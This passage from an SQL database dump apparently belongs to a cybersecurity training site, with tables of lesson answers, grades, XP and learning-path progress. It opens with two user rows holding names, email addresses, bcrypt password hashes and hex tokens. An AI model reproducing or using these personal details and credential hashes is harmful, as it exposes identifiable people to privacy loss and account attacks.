(71, NULL, 'Beth', 'Bmendvz@gmail.com', '$2a$10$wrQ.yPUP.IVCT2xTz5tkCORWS1V23712hCFfRenyqoeySpUH4DoS6', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-01-10 09:32:01', 'Jesusgohome', 'Mendoza', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-01-10 06:32:01', NULL, 1, 0, NULL, '1cc2310e29136efb84286c1f101c125024553c22bfc025f745a257c3db042c35', NULL, NULL),
(72, NULL, 'Maxwell', 'yesmax82@yahoo.com', '$2a$10$VxUatjNxptd.KoyLathEv.x8z1isalcAsqfrYxxVEVFQ8c8r3Ds8q', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-01-10 17:11:33', 'yesmax82', 'Owusu', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-01-10 14:11:33', NULL, 1, 0, NULL, 'bc395dca4d290f03e8faf928bf9bb720c3fb99102af4e51a816fe18746ddf086', NULL, NULL);

-- --------------------------------------------------------

--
-- Table structure for table `user_alert_assignments`
--

DROP TABLE IF EXISTS `user_alert_assignments`;
CREATE TABLE `user_alert_assignments` (
  `id` int(11) NOT NULL,
  `user_id` int(11) NOT NULL,
  `alert_id` int(11) NOT NULL,
  `assigned_date` date NOT NULL,
  `completed` tinyint(1) DEFAULT 0,
  `is_replay` tinyint(1) DEFAULT 0,
  `xp_earned` int(11) DEFAULT 0,
  `completed_at` datetime DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;

--
-- Dumping data for table `user_alert_assignments`
--

INSERT INTO `user_alert_assignments` (`id`, `user_id`, `alert_id`, `assigned_date`, `completed`, `is_replay`, `xp_earned`, `completed_at`) VALUES
(1, 34, 383, '2026-01-11', 0, 0, 0, NULL),
(2, 34, 398, '2026-01-11', 0, 0, 0, NULL),
(3, 34, 359, '2026-01-11', 0, 0, 0, NULL),
(4, 34, 375, '2026-01-11', 0, 0, 0, NULL),
(5, 34, 302, '2026-01-11', 0, 0, 0, NULL),
(6, 34, 599, '2026-01-11', 0, 0, 0, NULL),
(7, 34, 355, '2026-01-11', 0, 0, 0, NULL),
(8, 34, 345, '2026-01-11', 0, 0, 0, NULL),
(9, 34, 596, '2026-01-11', 0, 0, 0, NULL),
(10, 34, 573, '2026-01-11', 0, 0, 0, NULL);

-- --------------------------------------------------------

--
-- Table structure for table `user_badges`
--

DROP TABLE IF EXISTS `user_badges`;
CREATE TABLE `user_badges` (
  `id` int(11) NOT NULL,
  `user_id` int(11) NOT NULL,
  `badge_id` int(11) NOT NULL,
  `earned_at` timestamp NULL DEFAULT current_timestamp()
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;

--
-- Dumping data for table `user_badges`
--

INSERT INTO `user_badges` (`id`, `user_id`, `badge_id`, `earned_at`) VALUES
(1, 34, 1, '2025-12-26 01:00:05'),
(2, 1, 1, '2025-12-26 15:29:20'),
(3, 42, 1, '2025-12-30 13:40:31'),
(4, 65, 1, '2026-01-06 16:28:31');

-- --------------------------------------------------------

--
-- Table structure for table `user_lesson_answers`
--

DROP TABLE IF EXISTS `user_lesson_answers`;
CREATE TABLE `user_lesson_answers` (
  `id` int(11) NOT NULL,
  `user_id` int(11) NOT NULL,
  `question_id` int(11) NOT NULL,
  `submitted_answer` text DEFAULT NULL,
  `is_correct` tinyint(1) DEFAULT NULL,
  `submitted_at` timestamp NULL DEFAULT current_timestamp()
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;

--
-- Dumping data for table `user_lesson_answers`
--

INSERT INTO `user_lesson_answers` (`id`, `user_id`, `question_id`, `submitted_answer`, `is_correct`, `submitted_at`) VALUES
(14, 1, 4164, 'Risk reduction', 1, '2025-12-26 15:29:20'),
(15, 1, 4165, 'SOC team', 1, '2025-12-26 15:29:20'),
(16, 1, 4166, 'Context', 1, '2025-12-26 15:29:20'),
(32, 34, 5522, 'ERROR', 1, '2025-12-26 21:14:00'),
(33, 34, 5523, 'db_admin', 1, '2025-12-26 21:14:00'),
(34, 34, 5524, 'users_db', 1, '2025-12-26 21:14:00'),
(35, 1, 6475, 'Analysis and Context', 1, '2025-12-29 13:52:47'),
(36, 1, 6476, 'A report advising to block an IP due to active ransomware targeting your industry', 1, '2025-12-29 13:53:26'),
(37, 1, 6477, 'To support decision making', 1, '2025-12-29 13:53:26'),
(38, 42, 4164, 'Integrity', 1, '2025-12-30 13:40:30'),
(39, 42, 4165, 'To trick users into revealing information', 1, '2025-12-30 13:40:31'),
(40, 42, 4166, 'SOC Analyst', 1, '2025-12-30 13:40:31'),
(41, 42, 4167, 'Detection', 1, '2025-12-30 13:41:34'),
(42, 42, 4168, 'Threat actor', 1, '2025-12-30 13:41:34'),
(43, 42, 4169, 'High priority', 1, '2025-12-30 13:41:34'),
(44, 42, 4170, 'Log data', 1, '2025-12-30 13:42:10'),
(45, 42, 4171, 'Confirmed threat', 1, '2025-12-30 13:42:10'),
(46, 42, 4172, 'High priority', 1, '2025-12-30 13:42:10'),
(47, 42, 4173, 'Protection', 1, '2025-12-30 13:42:40'),
(48, 42, 4174, 'Detection', 1, '2025-12-30 13:42:40'),
(49, 42, 4175, 'Security tool', 1, '2025-12-30 13:42:40'),
(50, 42, 4176, 'Threat actor', 1, '2025-12-30 13:43:10'),
(51, 42, 4177, 'Log data', 1, '2025-12-30 13:43:10'),
(52, 42, 4178, 'Context', 1, '2025-12-30 13:43:10'),
(53, 42, 5339, 'Network', 1, '2025-12-30 13:45:54'),
(54, 42, 5340, 'Segments', 1, '2025-12-30 13:45:54'),
(55, 42, 5341, 'Presentation', 1, '2025-12-30 13:45:54'),
(56, 42, 5342, 'TCP', 1, '2025-12-30 13:46:37'),
(57, 42, 5343, 'Speed', 1, '2025-12-30 13:46:37'),
(58, 42, 5344, 'Internet', 1, '2025-12-30 13:46:37'),
(59, 42, 5345, '192.168.1.10', 1, '2025-12-30 13:47:41'),
(60, 42, 5346, '32', 1, '2025-12-30 13:47:41'),
(61, 42, 5347, 'NAT', 1, '2025-12-30 13:47:42'),
(62, 42, 5348, '/24', 1, '2025-12-30 13:50:19'),
(63, 42, 5349, '254', 1, '2025-12-30 13:50:19'),
(64, 42, 5350, 'Network ID', 1, '2025-12-30 13:50:19'),
(65, 42, 5351, 'A', 1, '2025-12-30 13:51:39'),
(66, 42, 5352, 'MX', 1, '2025-12-30 13:51:39'),
(67, 42, 5353, 'DNS', 1, '2025-12-30 13:51:39'),
(68, 42, 5354, 'Discover', 1, '2025-12-30 13:52:49'),
(69, 42, 5355, 'IP to MAC', 1, '2025-12-30 13:52:49'),
(70, 42, 5356, 'ARP Spoofing', 1, '2025-12-30 13:52:49'),
(71, 42, 5357, '22', 1, '2025-12-30 13:53:51'),
(72, 42, 5358, 'Telnet', 1, '2025-12-30 13:53:51'),
(73, 42, 5359, 'SMB', 1, '2025-12-30 13:53:51'),
(74, 65, 4164, 'Integrity', 1, '2026-01-06 16:28:30'),
(75, 65, 4165, 'To trick users into revealing information', 1, '2026-01-06 16:28:30'),
(76, 65, 4166, 'SOC Analyst', 1, '2026-01-06 16:28:31');

-- --------------------------------------------------------

--
-- Table structure for table `user_lesson_grades`
--

DROP TABLE IF EXISTS `user_lesson_grades`;
CREATE TABLE `user_lesson_grades` (
  `id` int(11) NOT NULL,
  `user_id` int(11) NOT NULL,
  `task_id` int(11) NOT NULL,
  `score` decimal(5,2) NOT NULL,
  `total_questions` int(11) NOT NULL,
  `correct_answers` int(11) NOT NULL,
  `passed` tinyint(1) DEFAULT 0,
  `completed_at` timestamp NULL DEFAULT current_timestamp()
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;

--
-- Dumping data for table `user_lesson_grades`
--

INSERT INTO `user_lesson_grades` (`id`, `user_id`, `task_id`, `score`, `total_questions`, `correct_answers`, `passed`, `completed_at`) VALUES
(1, 34, 1, 100.00, 4, 4, 1, '2025-12-26 01:24:19'),
(2, 34, 3, 100.00, 4, 4, 1, '2025-12-26 02:00:03'),
(3, 1, 1, 100.00, 3, 3, 1, '2025-12-26 15:29:20'),
(4, 34, 349, 92.00, 1, 1, 1, '2025-12-26 18:37:54'),
(5, 34, 350, 85.00, 1, 1, 1, '2025-12-26 19:11:06'),
(6, 34, 6, 100.00, 1, 1, 1, '2025-12-26 20:10:11'),
(7, 34, 7, 100.00, 1, 1, 1, '2025-12-26 20:14:32'),
(8, 34, 8, 100.00, 1, 1, 1, '2025-12-26 20:20:31'),
(9, 34, 9, 100.00, 1, 1, 1, '2025-12-26 20:22:23'),
(10, 34, 10, 100.00, 1, 1, 1, '2025-12-26 20:26:35'),
(11, 34, 11, 100.00, 1, 1, 1, '2025-12-26 20:28:07'),
(12, 34, 12, 100.00, 1, 1, 1, '2025-12-26 20:29:15'),
(13, 34, 32, 80.00, 5, 4, 1, '2025-12-26 20:44:41'),
(14, 34, 33, 80.00, 5, 4, 1, '2025-12-26 20:46:41'),
(15, 34, 34, 40.00, 5, 2, 0, '2025-12-26 20:47:33'),
(16, 34, 54, 100.00, 3, 3, 1, '2025-12-26 21:14:00'),
(17, 1, 771, 100.00, 3, 3, 1, '2025-12-29 13:53:27'),
(18, 42, 1, 100.00, 3, 3, 1, '2025-12-30 13:40:31'),
(19, 42, 2, 100.00, 3, 3, 1, '2025-12-30 13:41:34'),
(20, 42, 3, 100.00, 3, 3, 1, '2025-12-30 13:42:10'),
(21, 42, 4, 100.00, 3, 3, 1, '2025-12-30 13:42:41'),
(22, 42, 5, 100.00, 3, 3, 1, '2025-12-30 13:43:10'),
(23, 42, 22, 100.00, 3, 3, 1, '2025-12-30 13:45:54'),
(24, 42, 23, 100.00, 3, 3, 1, '2025-12-30 13:46:37'),
(25, 42, 24, 100.00, 3, 3, 1, '2025-12-30 13:47:42'),
(26, 42, 25, 100.00, 3, 3, 1, '2025-12-30 13:50:19'),
(27, 42, 26, 100.00, 3, 3, 1, '2025-12-30 13:51:39'),
(28, 42, 27, 100.00, 3, 3, 1, '2025-12-30 13:52:49'),
(29, 42, 28, 100.00, 3, 3, 1, '2025-12-30 13:53:51'),
(30, 65, 1, 100.00, 3, 3, 1, '2026-01-06 16:28:31');

-- --------------------------------------------------------

--
-- Table structure for table `user_operation_progress`
--

DROP TABLE IF EXISTS `user_operation_progress`;
CREATE TABLE `user_operation_progress` (
  `id` int(11) NOT NULL,
  `user_id` int(11) NOT NULL,
  `operation_id` int(11) NOT NULL,
  `current_alert_sequence` int(11) DEFAULT 1,
  `started_at` timestamp NOT NULL DEFAULT current_timestamp(),
  `completed_at` timestamp NULL DEFAULT NULL
) ENGINE=MyISAM DEFAULT CHARSET=latin1 COLLATE=latin1_swedish_ci;

--
-- Dumping data for table `user_operation_progress`
--

INSERT INTO `user_operation_progress` (`id`, `user_id`, `operation_id`, `current_alert_sequence`, `started_at`, `completed_at`) VALUES
(1, 34, 1, 3, '2025-12-31 13:11:32', NULL),
(2, 34, 7, 2, '2026-01-02 04:31:15', NULL),
(3, 1, 37, 1, '2026-01-05 03:22:25', NULL),
(4, 34, 37, 2, '2026-01-06 00:53:10', NULL),
(5, 1, 47, 1, '2026-01-06 01:49:25', NULL),
(6, 1, 48, 1, '2026-01-06 19:45:51', NULL),
(7, 68, 48, 4, '2026-01-07 16:11:48', NULL),
(8, 34, 48, 1, '2026-01-11 01:35:25', NULL),
(9, 34, 51, 1, '2026-01-11 01:38:00', NULL);

-- --------------------------------------------------------

--
-- Table structure for table `user_path_progress`
--

DROP TABLE IF EXISTS `user_path_progress`;
CREATE TABLE `user_path_progress` (
  `id` int(11) NOT NULL,
  `user_id` int(11) NOT NULL,
  `learning_path_id` int(11) NOT NULL,
  `enrolled_at` timestamp NULL DEFAULT current_timestamp(),
  `completed_at` timestamp NULL DEFAULT NULL,
  `percentage_completed` decimal(5,2) DEFAULT 0.00,
  `current_module_id` int(11) DEFAULT NULL,
  `created_at` timestamp NULL DEFAULT current_timestamp(),
  `updated_at` timestamp NULL DEFAULT current_timestamp() ON UPDATE current_timestamp(),
  `certificate_id` varchar(255) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;

--
-- Dumping data for table `user_path_progress`
--

INSERT INTO `user_path_progress` (`id`, `user_id`, `learning_path_id`, `enrolled_at`, `completed_at`, `percentage_completed`, `current_module_id`, `created_at`, `updated_at`, `certificate_id`) VALUES
(1, 34, 1, '2025-12-26 00:53:30', NULL, 29.55, NULL, '2025-12-26 00:53:30', '2025-12-26 20:46:41', NULL),
(2, 34, 2, '2025-12-26 02:54:35', NULL, 1.33, NULL, '2025-12-26 02:54:35', '2025-12-26 21:14:00', NULL),
(3, 34, 3, '2025-12-26 03:17:44', NULL, 0.00, NULL, '2025-12-26 03:17:44', '2025-12-26 03:17:44', NULL),
(5, 34, 4, '2025-12-26 03:17:47', NULL, 0.00, NULL, '2025-12-26 03:17:47', '2025-12-26 03:17:47', NULL),
(8, 1, 2, '2025-12-26 10:00:57', NULL, 0.00, NULL, '2025-12-26 10:00:57', '2025-12-26 10:00:57', NULL),
(10, 1, 4, '2025-12-26 14:08:00', NULL, 0.00, NULL, '2025-12-26 14:08:00', '2025-12-26 14:08:00', NULL),
(11, 1, 3, '2025-12-26 14:09:43', NULL, 0.00, NULL, '2025-12-26 14:09:43', '2025-12-26 14:09:43', NULL),
(12, 1, 1, '2025-12-26 15:33:20', NULL, 0.00, NULL, '2025-12-26 15:33:20', '2025-12-26 15:33:20', NULL),
(13, 34, 5, '2025-12-26 17:59:48', NULL, 8.00, NULL, '2025-12-26 17:59:48', '2025-12-29 03:18:58', NULL),
(14, 1, 5, '2025-12-27 03:06:50', NULL, 0.00, NULL, '2025-12-27 03:06:50', '2025-12-29 03:18:58', NULL),
(15, 39, 5, '2025-12-27 03:56:25', NULL, 0.00, NULL, '2025-12-27 03:56:25', '2025-12-29 03:18:58', NULL),
(16, 40, 5, '2025-12-27 04:13:07', NULL, 0.00, NULL, '2025-12-27 04:13:07', '2025-12-29 03:18:58', NULL),
(17, 40, 1, '2025-12-27 04:19:13', NULL, 0.00, NULL, '2025-12-27 04:19:13', '2025-12-27 04:19:13', NULL),
(18, 41, 5, '2025-12-27 10:28:37', NULL, 0.00, NULL, '2025-12-27 10:28:37', '2025-12-29 03:18:58', NULL),
(19, 42, 5, '2025-12-27 11:49:51', NULL, 0.00, NULL, '2025-12-27 11:49:51', '2025-12-29 03:18:58', NULL),
(20, 42, 1, '2025-12-27 12:42:27', NULL, 28.57, NULL, '2025-12-27 12:42:27', '2025-12-30 13:53:51', NULL),
(21, 43, 5, '2025-12-27 17:35:02', NULL, 0.00, NULL, '2025-12-27 17:35:02', '2025-12-29 03:18:58', NULL),
(22, 43, 1, '2025-12-27 17:36:08', NULL, 0.00, NULL, '2025-12-27 17:36:08', '2025-12-27 17:36:08', NULL),
(23, 44, 5, '2025-12-27 20:59:19', NULL, 0.00, NULL, '2025-12-27 20:59:19', '2025-12-29 03:18:58', NULL),
(24, 44, 1, '2025-12-27 21:00:51', NULL, 0.00, NULL, '2025-12-27 21:00:51', '2025-12-27 21:00:51', NULL),
(25, 45, 5, '2025-12-28 17:13:10', NULL, 0.00, NULL, '2025-12-28 17:13:10', '2025-12-29 03:18:58', NULL),
(26, 45, 4, '2025-12-28 17:13:28', NULL, 0.00, NULL, '2025-12-28 17:13:28', '2025-12-28 17:13:28', NULL),
(27, 46, 5, '2025-12-28 17:31:43', NULL, 0.00, NULL, '2025-12-28 17:31:43', '2025-12-29 03:18:58', NULL),
(28, 47, 5, '2025-12-28 17:52:28', NULL, 0.00, NULL, '2025-12-28 17:52:28', '2025-12-29 03:18:58', NULL),
(29, 48, 5, '2025-12-28 19:32:17', NULL, 0.00, NULL, '2025-12-28 19:32:17', '2025-12-29 03:18:58', NULL),
(30, 49, 5, '2025-12-28 19:54:53', NULL, 0.00, NULL, '2025-12-28 19:54:53', '2025-12-29 03:18:58', NULL),
(31, 50, 5, '2025-12-28 21:32:20', NULL, 0.00, NULL, '2025-12-28 21:32:20', '2025-12-29 03:18:58', NULL),
(32, 51, 5, '2025-12-28 21:55:58', NULL, 0.00, NULL, '2025-12-28 21:55:58', '2025-12-29 03:18:58', NULL),
(35, 51, 1, '2025-12-28 22:32:39', NULL, 0.00, NULL, '2025-12-28 22:32:39', '2025-12-28 22:32:39', NULL),
(36, 52, 5, '2025-12-29 00:28:27', NULL, 0.00, NULL, '2025-12-29 00:28:27', '2025-12-29 03:18:58', NULL),
(44, 52, 1, '2025-12-29 08:09:40', NULL, 0.00, NULL, '2025-12-29 08:09:40', '2025-12-29 08:09:40', NULL),
(45, 1, 6, '2025-12-29 13:51:54', NULL, 3.85, NULL, '2025-12-29 13:51:54', '2025-12-29 13:53:27', NULL),
(46, 1, 9, '2025-12-29 16:24:12', NULL, 0.00, NULL, '2025-12-29 16:24:12', '2025-12-29 16:24:12', NULL),
(47, 54, 9, '2025-12-29 21:29:25', NULL, 0.00, NULL, '2025-12-29 21:29:25', '2025-12-29 21:29:25', NULL),
(48, 54, 1, '2025-12-29 22:40:53', NULL, 0.00, NULL, '2025-12-29 22:40:53', '2025-12-29 22:40:53', NULL),
(49, 55, 9, '2025-12-31 01:11:23', NULL, 0.00, NULL, '2025-12-31 01:11:23', '2025-12-31 01:11:23', NULL),
(50, 56, 9, '2025-12-31 07:24:05', NULL, 0.00, NULL, '2025-12-31 07:24:05', '2025-12-31 07:24:05', NULL),
(51, 57, 9, '2025-12-31 07:24:26', NULL, 0.00, NULL, '2025-12-31 07:24:26', '2025-12-31 07:24:26', NULL),
(52, 56, 4, '2025-12-31 07:27:27', NULL, 0.00, NULL, '2025-12-31 07:27:27', '2025-12-31 07:27:27', NULL),
(53, 56, 6, '2025-12-31 07:28:39', NULL, 0.00, NULL, '2025-12-31 07:28:39', '2025-12-31 07:28:39', NULL),
(54, 56, 2, '2025-12-31 07:28:43', NULL, 0.00, NULL, '2025-12-31 07:28:43', '2025-12-31 07:28:43', NULL),
(55, 58, 9, '2025-12-31 14:33:15', NULL, 0.00, NULL, '2025-12-31 14:33:15', '2025-12-31 14:33:15', NULL),
(56, 59, 9, '2026-01-01 21:33:27', NULL, 0.00, NULL, '2026-01-01 21:33:27', '2026-01-01 21:33:27', NULL),
(57, 60, 9, '2026-01-02 00:49:19', NULL, 0.00, NULL, '2026-01-02 00:49:19', '2026-01-02 00:49:19', NULL),
(58, 61, 9, '2026-01-02 06:46:42', NULL, 0.00, NULL, '2026-01-02 06:46:42', '2026-01-02 06:46:42', NULL),
(59, 61, 1, '2026-01-02 06:49:58', NULL, 0.00, NULL, '2026-01-02 06:49:58', '2026-01-02 06:49:58', NULL),
(60, 62, 9, '2026-01-02 11:36:35', NULL, 0.00, NULL, '2026-01-02 11:36:35', '2026-01-02 11:36:35', NULL),
(61, 63, 9, '2026-01-02 21:09:30', NULL, 0.00, NULL, '2026-01-02 21:09:30', '2026-01-02 21:09:30', NULL),
(62, 64, 9, '2026-01-03 21:32:47', NULL, 0.00, NULL, '2026-01-03 21:32:47', '2026-01-03 21:32:47', NULL),
(63, 49, 1, '2026-01-04 22:28:44', NULL, 0.00, NULL, '2026-01-04 22:28:44', '2026-01-04 22:28:44', NULL),
(64, 61, 4, '2026-01-05 11:09:23', NULL, 0.00, NULL, '2026-01-05 11:09:23', '2026-01-05 11:09:23', NULL),
(65, 34, 9, '2026-01-06 00:39:27', NULL, 0.00, NULL, '2026-01-06 00:39:27', '2026-01-06 00:39:27', NULL),
(66, 65, 9, '2026-01-06 06:39:55', NULL, 0.00, NULL, '2026-01-06 06:39:55', '2026-01-06 06:39:55', NULL),
(67, 65, 3, '2026-01-06 06:49:34', NULL, 0.00, NULL, '2026-01-06 06:49:34', '2026-01-06 06:49:34', NULL),
(68, 65, 4, '2026-01-06 06:56:51', NULL, 0.00, NULL, '2026-01-06 06:56:51', '2026-01-06 06:56:51', NULL),
(69, 65, 1, '2026-01-06 07:02:18', NULL, 2.38, NULL, '2026-01-06 07:02:18', '2026-01-06 16:28:31', NULL),
(70, 65, 2, '2026-01-06 07:02:49', NULL, 0.00, NULL, '2026-01-06 07:02:49', '2026-01-06 07:02:49', NULL),
(71, 65, 6, '2026-01-06 08:12:49', NULL, 0.00, NULL, '2026-01-06 08:12:49', '2026-01-06 08:12:49', NULL),
(72, 66, 9, '2026-01-06 13:58:05', NULL, 0.00, NULL, '2026-01-06 13:58:05', '2026-01-06 13:58:05', NULL),
(73, 67, 9, '2026-01-07 03:07:05', NULL, 0.00, NULL, '2026-01-07 03:07:05', '2026-01-07 03:07:05', NULL),
(74, 68, 9, '2026-01-07 15:58:56', NULL, 0.00, NULL, '2026-01-07 15:58:56', '2026-01-07 15:58:56', NULL),
(75, 68, 1, '2026-01-07 16:03:06', NULL, 0.00, NULL, '2026-01-07 16:03:06', '2026-01-07 16:03:06', NULL),
(76, 69, 9, '2026-01-07 22:45:50', NULL, 0.00, NULL, '2026-01-07 22:45:50', '2026-01-07 22:45:50', NULL),
(77, 70, 9, '2026-01-08 14:51:54', NULL, 0.00, NULL, '2026-01-08 14:51:54', '2026-01-08 14:51:54', NULL),
(78, 71, 9, '2026-01-10 06:32:03', NULL, 0.00, NULL, '2026-01-10 06:32:03', '2026-01-10 06:32:03', NULL),
(79, 72, 9, '2026-01-10 14:11:37', NULL, 0.00, NULL, '2026-01-10 14:11:37', '2026-01-10 14:11:37', NULL),
(80, 72, 1, '2026-01-10 14:19:22', NULL, 0.00, NULL, '2026-01-10 14:19:22', '2026-01-10 14:19:22', NULL);

-- --------------------------------------------------------

--
-- Table structure for table `user_path_specialization`
--

DROP TABLE IF EXISTS `user_path_specialization`;
CREATE TABLE `user_path_specialization` (
  `id` int(11) NOT NULL,
  `user_id` int(11) NOT NULL,
  `path_code` varchar(20) NOT NULL,
  `level` int(11) DEFAULT 1,
  `xp` int(11) DEFAULT 0,
  `alerts_completed` int(11) DEFAULT 0,
  `missions_completed` int(11) DEFAULT 0,
  `average_score` decimal(5,2) DEFAULT 0.00,
  `last_activity_date` datetime DEFAULT NULL,
  `created_at` timestamp NOT NULL DEFAULT current_timestamp(),
  `updated_at` timestamp NOT NULL DEFAULT current_timestamp() ON UPDATE current_timestamp()
) ENGINE=MyISAM DEFAULT CHARSET=latin1 COLLATE=latin1_swedish_ci;

-- --------------------------------------------------------

--
-- Table structure for table `user_task_progress`
--

DROP TABLE IF EXISTS `user_task_progress`;
CREATE TABLE `user_task_progress` (
  `id` int(11) NOT NULL,
  `user_id` int(11) NOT NULL,
  `task_id` int(11) NOT NULL,
  `completed` tinyint(1) DEFAULT 0,
  `completed_at` timestamp NULL DEFAULT NULL,
  `created_at` timestamp NULL DEFAULT current_timestamp(),
  `updated_at` timestamp NULL DEFAULT current_timestamp() ON UPDATE current_timestamp()
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;

--
-- Dumping data for table `user_task_progress`
--

INSERT INTO `user_task_progress` (`id`, `user_id`, `task_id`, `completed`, `completed_at`, `created_at`, `updated_at`) VALUES
(1, 34, 1, 1, '2025-12-26 01:00:05', '2025-12-26 01:00:05', '2025-12-26 01:00:05'),
(2, 34, 5, 1, '2025-12-26 01:02:04', '2025-12-26 01:02:04', '2025-12-26 01:02:04'),
(3, 34, 2, 1, '2025-12-26 01:04:03', '2025-12-26 01:04:03', '2025-12-26 01:04:03'),
(4, 34, 3, 1, '2025-12-26 02:00:03', '2025-12-26 02:00:03', '2025-12-26 02:00:03'),
(5, 1, 1, 1, '2025-12-26 15:29:20', '2025-12-26 15:29:20', '2025-12-26 15:29:20'),
(6, 34, 349, 1, '2025-12-26 18:31:49', '2025-12-26 18:31:49', '2025-12-26 18:31:49'),
(7, 34, 350, 1, '2025-12-26 19:11:06', '2025-12-26 19:11:06', '2025-12-26 19:11:06'),
(8, 34, 6, 1, '2025-12-26 20:10:11', '2025-12-26 20:10:11', '2025-12-26 20:10:11'),
(9, 34, 7, 1, '2025-12-26 20:14:32', '2025-12-26 20:14:32', '2025-12-26 20:14:32'),
(10, 34, 8, 1, '2025-12-26 20:20:31', '2025-12-26 20:20:31', '2025-12-26 20:20:31'),
(11, 34, 9, 1, '2025-12-26 20:22:23', '2025-12-26 20:22:23', '2025-12-26 20:22:23'),
(12, 34, 10, 1, '2025-12-26 20:26:35', '2025-12-26 20:26:35', '2025-12-26 20:26:35'),
(13, 34, 11, 1, '2025-12-26 20:28:07', '2025-12-26 20:28:07', '2025-12-26 20:28:07'),
(14, 34, 12, 1, '2025-12-26 20:29:15', '2025-12-26 20:29:15', '2025-12-26 20:29:15'),
(15, 34, 32, 1, '2025-12-26 20:44:41', '2025-12-26 20:44:41', '2025-12-26 20:44:41'),
(16, 34, 33, 1, '2025-12-26 20:46:41', '2025-12-26 20:46:41', '2025-12-26 20:46:41'),
(17, 34, 54, 1, '2025-12-26 21:14:00', '2025-12-26 21:14:00', '2025-12-26 21:14:00'),
(18, 1, 771, 1, '2025-12-29 13:53:27', '2025-12-29 13:53:27', '2025-12-29 13:53:27'),
(19, 42, 1, 1, '2025-12-30 13:40:31', '2025-12-30 13:40:31', '2025-12-30 13:40:31'),
(20, 42, 2, 1, '2025-12-30 13:41:34', '2025-12-30 13:41:34', '2025-12-30 13:41:34'),
(21, 42, 3, 1, '2025-12-30 13:42:10', '2025-12-30 13:42:10', '2025-12-30 13:42:10'),
(22, 42, 4, 1, '2025-12-30 13:42:41', '2025-12-30 13:42:41', '2025-12-30 13:42:41'),
(23, 42, 5, 1, '2025-12-30 13:43:10', '2025-12-30 13:43:10', '2025-12-30 13:43:10'),
(24, 42, 22, 1, '2025-12-30 13:45:54', '2025-12-30 13:45:54', '2025-12-30 13:45:54'),
(25, 42, 23, 1, '2025-12-30 13:46:37', '2025-12-30 13:46:37', '2025-12-30 13:46:37'),
(26, 42, 24, 1, '2025-12-30 13:47:42', '2025-12-30 13:47:42', '2025-12-30 13:47:42'),
(27, 42, 25, 1, '2025-12-30 13:50:19', '2025-12-30 13:50:19', '2025-12-30 13:50:19'),
(28, 42, 26, 1, '2025-12-30 13:51:39', '2025-12-30 13:51:39', '2025-12-30 13:51:39'),
(29, 42, 27, 1, '2025-12-30 13:52:49', '2025-12-30 13:52:49', '2025-12-30 13:52:49'),
(30, 42, 28, 1, '2025-12-30 13:53:51', '2025-12-30 13:53:51', '2025-12-30 13:53:51'),
(31, 65, 1, 1, '2026-01-06 16:28:31', '2026-01-06 16:28:31', '2026-01-06 16:28:31');

-- --------------------------------------------------------

--
-- Table structure for table `user_xp`
--

DROP TABLE IF EXISTS `user_xp`;
CREATE TABLE `user_xp` (
  `user_id` int(11) NOT NULL,
  `total_xp` int(11) DEFAULT 0,
  `current_level` int(11) DEFAULT 1,
  `xp_to_next_level` int(11) DEFAULT 100,
  `streak_days` int(11) DEFAULT 0,
  `last_activity_date` date DEFAULT NULL,
  `created_at` timestamp NULL DEFAULT current_timestamp(),
  `updated_at` timestamp NULL DEFAULT current_timestamp() ON UPDATE current_timestamp()
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;

--
-- Dumping data for table `user_xp`
--

INSERT INTO `user_xp` (`user_id`, `total_xp`, `current_level`, `xp_to_next_level`, `streak_days`, `last_activity_date`, `created_at`, `updated_at`) VALUES
(1, 170, 2, 200, 1, '2026-01-11', '2025-12-26 10:00:34', '2026-01-11 00:54:03'),
(34, 760, 8, 800, 1, '2026-01-11', '2025-12-26 00:52:27', '2026-01-11 00:54:37'),
(40, 0, 1, 100, 0, NULL, '2025-12-27 04:17:43', '2025-12-27 04:17:43'),
(42, 630, 7, 700, 0, NULL, '2025-12-27 11:51:16', '2025-12-30 13:53:51'),
(43, 0, 1, 100, 0, NULL, '2025-12-27 17:35:51', '2025-12-27 17:35:51'),
(44, 0, 1, 100, 0, NULL, '2025-12-27 21:00:47', '2025-12-27 21:00:47'),
(45, 0, 1, 100, 0, NULL, '2025-12-28 17:13:20', '2025-12-28 17:13:20'),
(49, 0, 1, 100, 0, NULL, '2026-01-04 22:28:27', '2026-01-04 22:28:27'),
(50, 0, 1, 100, 0, NULL, '2025-12-28 22:58:56', '2025-12-28 22:58:56'),
(51, 0, 1, 100, 0, NULL, '2025-12-28 21:56:13', '2025-12-28 21:56:13'),
(52, 0, 1, 100, 0, NULL, '2025-12-29 08:08:59', '2025-12-29 08:08:59'),
(54, 100, 2, 200, 1, '2026-01-03', '2025-12-29 21:45:59', '2026-01-03 16:55:44'),
(56, 0, 1, 100, 0, NULL, '2025-12-31 07:27:18', '2025-12-31 07:27:18'),
(60, 0, 1, 100, 0, NULL, '2026-01-02 00:57:21', '2026-01-02 00:57:21'),
(61, 0, 1, 100, 0, NULL, '2026-01-02 06:48:50', '2026-01-02 06:48:50'),
(65, 70, 1, 100, 0, NULL, '2026-01-06 06:48:50', '2026-01-06 16:28:31'),
(68, 0, 1, 100, 0, NULL, '2026-01-07 16:01:15', '2026-01-07 16:01:15'),
(71, 0, 1, 100, 0, NULL, '2026-01-10 06:39:37', '2026-01-10 06:39:37'),
(72, 0, 1, 100, 0, NULL, '2026-01-10 14:15:16', '2026-01-10 14:15:16');

--
-- Indexes for dumped tables
--

--
-- Indexes for table `alerts`
--
ALTER TABLE `alerts`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `alert_grades`
--
ALTER TABLE `alert_grades`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `badges`
--
ALTER TABLE `badges`
